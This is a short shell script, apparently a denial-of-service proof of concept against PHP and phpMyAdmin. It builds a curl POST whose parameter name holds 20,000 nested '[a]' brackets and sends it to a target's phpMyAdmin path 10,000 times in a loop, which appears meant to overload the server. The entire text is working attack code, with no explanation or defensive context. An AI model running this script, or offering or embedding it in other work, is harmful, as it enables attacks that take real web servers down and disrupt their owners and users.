#!/bin/sh foo="curl http://xxx.xxx.xx.xx/phpmyadmin/ -d a"`php -r 'echo str_repeat("[a]",20000);'`"=1" for i in `seq 1 10000`; do `$foo`; done